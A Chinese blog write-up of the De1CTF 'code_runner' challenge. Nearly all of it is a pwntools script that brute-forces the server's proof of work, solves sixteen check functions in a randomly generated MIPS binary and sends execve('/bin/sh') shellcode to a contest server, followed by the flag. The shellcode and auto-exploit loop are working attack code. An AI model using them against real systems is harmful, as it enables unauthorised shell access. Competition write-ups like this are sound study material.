avatar
文章
172
标签
51
分类
29
首页
归档
标签
分类
友链
关于
额外功能
咲夜南梦's 博客
首页
归档
标签
分类
友链
关于
额外功能
CTF-De1CTF-code_runner-自动化挖掘
|CTF
阅读量:|评论数:

CTF-De1CTF-code_runner-自动化挖掘

这次比赛遇到一个动态pwn,就记录一下自己的解法

爆破脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def input_key():
    have_key = False
    sh.recvuntil("hashlib.sha256(s).hexdigest() == \"")
    checkcode_result = sh.recvuntil("\"",drop=True)
    for i in range(0,256):
        if have_key:
            break
        for j in range(0,256):
            if have_key:
                break
            for k in range(0,256):
                if have_key:
                    break
                if hashlib.sha256(chr(i) + chr(j) + chr(k)).hexdigest() == checkcode_result:
                    sh.sendline(chr(i) + chr(j) + chr(k))
                    log.success("key => %s" % chr(i) + chr(j) + chr(k))
                    have_key = True

连接之后发现base64返回一个gz压缩包,然后解压之后就是elf,每次连接的elf的文件都是不一样的,所以大概就是要写一个自动挖掘机,在短时间pwn掉这个程序。

首先这个程序有16个check,所以要先过16个check,然后后面输入名字,直接输入空字符直接绕过while直接break。

然后输入一个shellcode即可

根据函数的头部来确定check函数地址,然后通过做差计算出每一个函数的size,然后通过size进行分组,每一个分组对应着一个解法,通过这个思路只要写出所有的size的应对策略就可以实现自动化挖掘。

本人封装了提取函数get_idx(data,pos,size)和get_opcode_arg(data,pos,size,opcode)

第一个函数可以找到mips汇编下的数组下标

第二个函数可以根据mips’s opcode来或者opcode的参数

通过下表和opcode的参数来确定方程的表达式,通过sympy来计算答案,还有一部分较为固定的表达式可以采用预先设置一个固定值的方式。

由于本人很懒,只写了几个size的策略,不过也足够了,通过5个终端爆破10分钟就可以有一个命中。

Exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
from sympy import *
from pwn import *
import sys
import os
import hashlib
context.log_level = "DEBUG"
#sh = remote("106.53.114.216",9999)
flag = 0
sh = None
def input_key():
    have_key = False
    sh.recvuntil("hashlib.sha256(s).hexdigest() == \"")
    checkcode_result = sh.recvuntil("\"",drop=True)
    for i in range(0,256):
        if have_key:
            break
        for j in range(0,256):
            if have_key:
                break
            for k in range(0,256):
                if have_key:
                    break
                if hashlib.sha256(chr(i) + chr(j) + chr(k)).hexdigest() == checkcode_result:
                    sh.sendline(chr(i) + chr(j) + chr(k))
                    log.success("key => %s" % chr(i) + chr(j) + chr(k))
                    have_key = True

def get_binary():
    input_key()
    sh.recvuntil("===============\n")
    data = sh.recvuntil("\n===============",True)
    log.success("dump => " + data)
    os.system("echo %s | base64 -d > ./binary.gz;" % data)
    os.system("chmod 777 ./binary.gz")
    os.system("rm -rf ./binary")
    os.system("gzip -d ./binary.gz")


def find_check1_head(elf):
    head = "E0 FF BD 27 1C 00 BF AF 18 00 BE AF 25 F0 A0 03 20 00 C4 AF 20 00 C4 8F B3 07 10 0C 00 00 00 00 25 E8 C0 03 1C 00 BF 8F 18 00 BE 8F 20 00 BD 27 08 00 E0 03 00 00 00 00"
    head = '\xE0\xFF\xBD\x27\x1C\x00\xBF\xAF\x18\x00\xBE\xAF\x25\xF0\xA0\x03\x20\x00\xC4\xAF\x20\x00\xc4\x8f'
    head_addr = elf.search(head).next()
    log.success("Find Head => %s" % hex(head_addr))
    return head_addr


def find_check1_functions(elf,head_addr):
    func_head = '\xE0\xFF\xBD\x27\x1C\x00\xBF\xAF\x18\x00\xBE\xAF'
    head_addr_gen = elf.search(func_head)
    head_addr_list = []
    for i in head_addr_gen:
        if i < head_addr:
            head_addr_list.append(i)
        else:
            break
    return head_addr_list

def get_idx(data,pos,size):
    for i in range(0,len(data[pos:pos+size])):
        buf = data[pos+i:][:1]
        if buf != '\x00' and ord(buf) < 4:
            return ord(buf)
        i+=4
    return 0

def get_opcode_arg(data,pos,size,opcode):
    for i in range(0,len(data[pos:pos+size])):
        buf = data[pos+i:][:4]
        if (buf[2]+buf[3]) == opcode:
            return ord(buf[0]) + (ord(buf[1]) << 8)
        i+=4
    return -1

def hack(data):
    size = len(data)
    if size == 0xb8:
        buf2 = data[0x00400BB8-0x00400B5C:][:1]
        buf1 = data[0x00400BD0-0x00400B5C:][:1]
        buf3 = buf1
        buf0 = buf2
        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    if size == 0xcc:
        log.success("\tparam_1 => %s %s %s %s" % (hex(0),hex(0),hex(0),hex(0)))
        return '\x00' * 4
        '''
        if data[0x00400FF8 - 0x00400FE0:][:4] == '\x01\x00\x42\x24':
            log.success("\ttype => 1")
            tmp1 = ord(data[0x00401014 - 0x00400FE0][:1])
            tmp2 = ord(data[0x00401040 - 0x00400FE0][:1])
            tmp3 = ord(data[0x00401068 - 0x00400FE0][:1])
            log.success("\ttmp1 => %s" % hex(tmp1))
            log.success("\ttmp2 => %s" % hex(tmp2))
            log.success("\ttmp3 => %s" % hex(tmp3))
            i=Symbol('i')
            j=Symbol('j')
            k=Symbol('k')
            l=Symbol('l')
            answer = solve([j+k-tmp1,k-tmp2,k+l-tmp2,l+i-tmp3],[i,j,k,l])
            log.success("\tparam_1[0] => %s" % hex(ord(chr(answer[i]))))
            log.success("\tparam_1[1] => %s" % hex(ord(chr(answer[j]))))
            log.success("\tparam_1[2] => %s" % hex(ord(chr(answer[k]))))
            log.success("\tparam_1[3] => %s" % hex(ord(chr(answer[l]))))
            return chr(answer[i]) + chr(answer[j]) + chr(answer[k]) + chr(answer[l])
        else:
            log.success("\ttype => 2")
            tmp1 = ord(data[0x00400F44 - 0x00400F14][:1])
            tmp2 = ord(data[0x00400F70 - 0x00400F14][:1])
            tmp3 = ord(data[0x00400F9C - 0x00400F14][:1])
            log.success("\ttmp1 => %s" % hex(tmp1))
            log.success("\ttmp2 => %s" % hex(tmp2))
            log.success("\ttmp3 => %s" % hex(tmp3))
            i=Symbol('i')
            j=Symbol('j')
            k=Symbol('k')
            l=Symbol('l')
            answer = solve([i+j-tmp1,j-tmp2,j+k-tmp2,k+l-tmp3],[i,j,k,l])
            log.success("\tparam_1[0] => %s" % hex(ord(chr(answer[i] % 0x100))))
            log.success("\tparam_1[1] => %s" % hex(ord(chr(answer[j] % 0x100))))
            log.success("\tparam_1[2] => %s" % hex(ord(chr(answer[k] % 0x100))))
            log.success("\tparam_1[3] => %s" % hex(ord(chr(answer[l] % 0x100))))
            return chr(answer[i] % 0x100) + chr(answer[j] % 0x100) + chr(answer[k] % 0x100) + chr(answer[l] % 0x100)
        '''
    if size == 0x138:
        buf0 = data[0x004013BC-0x004013A0:][:1]
        buf1 = data[0x004013D4-0x004013A0:][:1]
        buf2 = chr((ord(buf0) * ord(buf0)) % 0x100)
        buf3 = chr((ord(buf1) * ord(buf1)) % 0x100)
        log.success("\tbuf0 => %s" % hex(ord(buf0)))
        log.success("\tbuf1 => %s" % hex(ord(buf1)))
        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    if size == 0xb4:
        buf_list = [-1,-1,-1,-1]
        idx1 = get_idx(data,0x14,8)
        idx2 = get_idx(data,0x14 + 8 + 4,0x10 - 4)
        idx3 = get_idx(data,0x00400B8C-0x00400B5C,8)
        idx4 = get_idx(data,0x00400B8C-0x00400B5C + 8 + 4,8)
        idx5 = get_idx(data,0x00400B8C-0x00400B5C + 8 + 0x18,8)
        idx6 = get_idx(data,0x00400BC4-0x00400B5C-4,8 + 4)
        tmp1 = get_opcode_arg(data,0x00400BAC - 0x00400B5C+8,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00400BAC - 0x00400B5C+8 + 8,0x20,'\x02\x24')
        buf_list[idx5] = tmp1
        buf_list[idx6] = tmp2

        if buf_list[idx1] != -1:
            buf_list[idx2] = buf_list[idx1]
        else:
            buf_list[idx1] = buf_list[idx2]
        if buf_list[idx3] != -1:
            buf_list[idx4] = buf_list[idx3]
        else:
            buf_list[idx3] = buf_list[idx4]
        log.success("\tidx1 => %s" % hex(idx1))
        log.success("\tidx2 => %s" % hex(idx2))
        log.success("\tidx3 => %s" % hex(idx3))
        log.success("\tidx4 => %s" % hex(idx4))
        log.success("\tidx5 => %s" % hex(idx5))
        log.success("\tidx6 => %s" % hex(idx6))
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        log.success("\tparam_1[0] => %s" % hex(buf_list[0]))
        log.success("\tparam_1[1] => %s" % hex(buf_list[1]))
        log.success("\tparam_1[2] => %s" % hex(buf_list[2]))
        log.success("\tparam_1[3] => %s" % hex(buf_list[3]))
        return chr(buf_list[0]) + chr(buf_list[1]) +chr(buf_list[2]) +chr(buf_list[3])
    if size == 0x108:
        tmp1 = get_opcode_arg(data,0x00400DF8 - 0x00400DCC,8,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00400E10 - 0x00400DCC,8,'\x02\x24')

        buf1 = chr(tmp2)
        buf0 = chr(tmp2 ^ tmp1)
        buf3 = chr(((ord(buf0) ^ ord(buf1))&0x7f)<<1)
        buf2 = chr(ord(buf3) ^ tmp1)
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))

        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    if size == 0x110:
        tmp1 = get_opcode_arg(data,0x00401A74 - 0x00401A44,8,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401A8C - 0x00401A44,8,'\x02\x24')

        buf2 = chr(tmp2)
        buf1 = chr(tmp2 ^ tmp1)
        buf3 = chr(((ord(buf1) ^ ord(buf2))&0x7f)<<1)
        buf0 = chr(ord(buf3) ^ tmp1)
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))

        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    if size == 0x104:
        tmp1 = get_opcode_arg(data,0x004010FC - 0x004010D0,8,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401110 - 0x004010D0,8,'\x02\x24')
        buf0 = chr(tmp2)
        buf3 = chr(tmp2 ^ tmp1)
        buf1 = chr(((ord(buf3) ^ ord(buf0))&0x7f)<<1)
        buf2 = chr(ord(buf1) ^ tmp1)
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    if size == 0xc8:
        log.success("\tparam_1 => %s %s %s %s" % (hex(0),hex(0),hex(0),hex(0)))
        return '\x00' * 4
        '''
        idx_list = []
        idx_list.append(get_idx(data,0x00400CDC - 0x00400CC8,8))
        idx_list.append(get_idx(data,0x0040148C - 0x00401468,8))
        idx_list.append(get_idx(data,0x004014A8 - 0x00401468,8))
        idx_list.append(get_idx(data,0x00400D10 - 0x00400CC8,8))
        idx_list.append(get_idx(data,0x00400D2C - 0x00400CC8,8))
        idx_list.append(get_idx(data,0x00400D3C - 0x00400CC8,8))
        tmp1 = get_opcode_arg(data,0x00400CF4 - 0x00400CC8,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00400D20 - 0x00400CC8,0x10,'\x02\x24')
        tmp3 = get_opcode_arg(data,0x00400D4C - 0x00400CC8,0x10,'\x02\x24')
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        log.success("\ttmp3 => %s" % hex(tmp3))

        buf_list = [-1,-1,-1,-1]
        buf_list[idx_list[1]] = tmp2;
        buf_list[idx_list[0]] = tmp1 - tmp2;
        buf_list[idx_list[3]] = 0;
        buf_list[idx_list[5]] = tmp3;

        print idx_list
        log.success("\tparam_1[0] => %s" % hex(buf_list[0]))
        log.success("\tparam_1[1] => %s" % hex(buf_list[1]))
        log.success("\tparam_1[2] => %s" % hex(buf_list[2]))
        log.success("\tparam_1[3] => %s" % hex(buf_list[3]))

        return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])
        '''


    if size == 0x130:
        idx_list = []
        buf_list = [-1,-1,-1,-1]
        idx_list.append(get_idx(data,0x00400B70 - 0x00400B5C,8))
        tmp1 = get_opcode_arg(data,0x004012C8 - 0x00401288,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401300 - 0x00401288,0x10,'\x02\x24')
        tmp3 = get_opcode_arg(data,0x00401338 - 0x00401288,0x10,'\x02\x24')
        tmp4 = get_opcode_arg(data,0x00401370 - 0x00401288,0x10,'\x02\x24')
        i=Symbol('i')
        j=Symbol('j')
        k=Symbol('k')
        l=Symbol('l')
        if idx_list[0] == 1:
            answer = solve([j+k+l-tmp1,k+l+i-tmp2,l+i+j-tmp3,i+j+k-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]
        elif idx_list[0] == 0:
            answer = solve([i+j+k-tmp1,j+k+l-tmp2,k+l+i-tmp3,l+i+j-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]
        elif idx_list[0] == 2:
            answer = solve([k+l+i-tmp1,l+i+j-tmp2,i+j+k-tmp3,j+k+l-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]
        elif idx_list[0] == 3:
            answer = solve([l+i+j-tmp1,i+j+k-tmp2,j+k+l-tmp3,k+l+i-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]

        print answer


        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        log.success("\ttmp3 => %s" % hex(tmp3))
        log.success("\ttmp4 => %s" % hex(tmp4))

        log.success("\tparam_1[0] => %s" % hex(ord(chr(buf_list[0]))))
        log.success("\tparam_1[1] => %s" % hex(ord(chr(buf_list[1]))))
        log.success("\tparam_1[2] => %s" % hex(ord(chr(buf_list[2]))))
        log.success("\tparam_1[3] => %s" % hex(ord(chr(buf_list[3]))))
        return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])
    if size == 0x1bc:
        tmp1 = get_opcode_arg(data,0x00401894 - 0x004017D4,0x10,'\x40\x10')
        if tmp1 != -1:
            log.success("\tparam_1[0] => %s" % hex(0x0))
            log.success("\tparam_1[1] => %s" % hex(0x0))
            log.success("\tparam_1[2] => %s" % hex(0x1))
            log.success("\tparam_1[3] => %s" % hex(0x3))
            return '\x00\x00\x01\x03'
        else:
            log.success("\tparam_1[0] => %s" % hex(0x01))
            log.success("\tparam_1[1] => %s" % hex(0x03))
            log.success("\tparam_1[2] => %s" % hex(0x00))
            log.success("\tparam_1[3] => %s" % hex(0x00))
            return '\x03\x01\x00\x00'

    if size == 0x148:
        idx_list = []
        idx_list.append(get_idx(data,0x00400ED0 - 0x00400EC0,0x10))
        idx_list.append(get_idx(data,0x00400EEC - 0x00400EC0,0x10))
        idx_list.append(get_idx(data,0x00400F04 - 0x00400EC0,0x10))
        tmp1 = get_opcode_arg(data,0x00400EDC - 0x00400EC0,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00400EF8 - 0x00400EC0,0x10,'\x02\x24')
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        print idx_list
        buf_list = [-1,-1,-1,-1]
        buf_list[idx_list[0]] = tmp1
        buf_list[idx_list[1]] = tmp2
        buf_list[idx_list[2]] = (tmp1 * tmp1) % 0x100
        for i in [0,1,2,3]:
            if i not in idx_list:
                buf_list[i] = (tmp2 * tmp2 + buf_list[idx_list[2]] *  buf_list[idx_list[2]] - tmp1 * tmp1) % 0x100
                break
        log.success("\tparam_1[0] => %s" % hex(ord(chr(buf_list[0]))))
        log.success("\tparam_1[1] => %s" % hex(ord(chr(buf_list[1]))))
        log.success("\tparam_1[2] => %s" % hex(ord(chr(buf_list[2]))))
        log.success("\tparam_1[3] => %s" % hex(ord(chr(buf_list[3]))))
        return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])
    if size == 0x140:
        idx_list = []
        idx_list.append(get_idx(data,0x0040184C - 0x00401838,0x10))
        idx_list.append(get_idx(data,0x00400EEC - 0x00400EC0,0x8))
        idx_list.append(get_idx(data,0x00401874 - 0x00401838,0x10))
        tmp1 = get_opcode_arg(data,0x00401854 - 0x00401838,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401868 - 0x00401838,0x10,'\x02\x24')
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        print idx_list
        buf_list = [-1,-1,-1,-1]
        buf_list[idx_list[0]] = tmp1
        buf_list[idx_list[1]] = tmp2
        buf_list[idx_list[2]] = (tmp1 * tmp1) % 0x100
        for i in [0,1,2,3]:
            if i not in idx_list:
                buf_list[i] = (tmp2 * tmp2 + buf_list[idx_list[2]] *  buf_list[idx_list[2]] - tmp1 * tmp1) % 0x100
                break
        log.success("\tparam_1[0] => %s" % hex(ord(chr(buf_list[0]))))
        log.success("\tparam_1[1] => %s" % hex(ord(chr(buf_list[1]))))
        log.success("\tparam_1[2] => %s" % hex(ord(chr(buf_list[2]))))
        log.success("\tparam_1[3] => %s" % hex(ord(chr(buf_list[3]))))
    
        return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])

    return '\x00' * 4

def main():
    global flag
    if len(sys.argv) > 1:
        elf = ELF(sys.argv[1])
    else:
        elf = ELF("./binary")
    payload = ''
    head_addr = find_check1_head(elf)
    check1_function_list = find_check1_functions(elf,head_addr)
    check1_function_list.reverse()
    for i in range(0,len(check1_function_list)):
        log.success("check%d => %s" % (i+1,hex(check1_function_list[i])))
    for i in range(0,len(check1_function_list)):
        if i == 0:
            code_data = elf.read(check1_function_list[i],head_addr - check1_function_list[i])
            log.success("check%d code size => %s" % (i+1,hex(head_addr - check1_function_list[i])))
        else:
            code_data = elf.read(check1_function_list[i],check1_function_list[i-1] - check1_function_list[i])
            log.success("check%d code size => %s" % (i+1,hex(check1_function_list[i-1] - check1_function_list[i])))
        payload += hack(code_data)
    #log.success("pid => %s" % sh.pid)
    #pause()

    sh.sendlineafter('Faster > \n',payload)
    sh.recvuntil(">")
    sh.sendline("\x00XYNM")
    sh.recvuntil("Your time comes.\n>")

    payload  = "\xff\xff\x06\x28"  
    payload += "\xff\xff\xd0\x04"  
    payload += "\xff\xff\x05\x28"  
    payload += "\x01\x10\xe4\x27"  
    payload += "\x0f\xf0\x84\x24"  
    payload += "\xab\x0f\x02\x24"  
    payload += "\x0c\x01\x01\x01"  
    payload += "/bin/sh\x00"
    
    sh.sendline(payload)
    flag = 1
    sh.interactive()

if __name__ == "__main__":
    '''
    sh = process(["qemu-mipsel", "-g", "2333", "-L", "/usr/mipsel-linux-gnu/", "./binary"])
    # sh = process(["qemu-mipsel", "-L", "/usr/mipsel-linux-gnu/", "./binary"])
    # sh = remote("106.53.114.216",9999)
    if len(sys.argv) == 1:
        get_binary()
    main()
    '''
    while 1:
        try:
            if flag == 1:
                break
            if len(sys.argv) == 1:
                get_binary()
            main()
        except EOFError:
            sh.close()
            sh = remote("106.53.114.216",9999)
            continue
        except KeyboardInterrupt:
            break
        except :
            sh.close()
            sh = remote("106.53.114.216",9999)
            continue
        else:
            break

运行一段时间之后就可以得到flag

De1ctf{9d94bc3d3f57f1b33aee728b5d32d6d473df8df3}

文章作者: 咲夜南梦
文章链接: http://yoursite.com/2020/05/03/CTF-De1CTF-code_runner-%E8%87%AA%E5%8A%A8%E5%8C%96%E6%8C%96%E6%8E%98/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客
CTF MIPS
打赏
  • 微信
    微信
  • 支付宝
    支付宝
相关推荐
2019-12-31
CTF-MIPS-入门指南
2020-01-01
MIPS-固件环境配置
2020-04-30
ARM-常用汇编
2018-11-09
密码学-Blowfish加密算法
2020-04-22
C-Socket编程
2019-08-30
CTF-19年OPPO_OGeek_线上赛
评论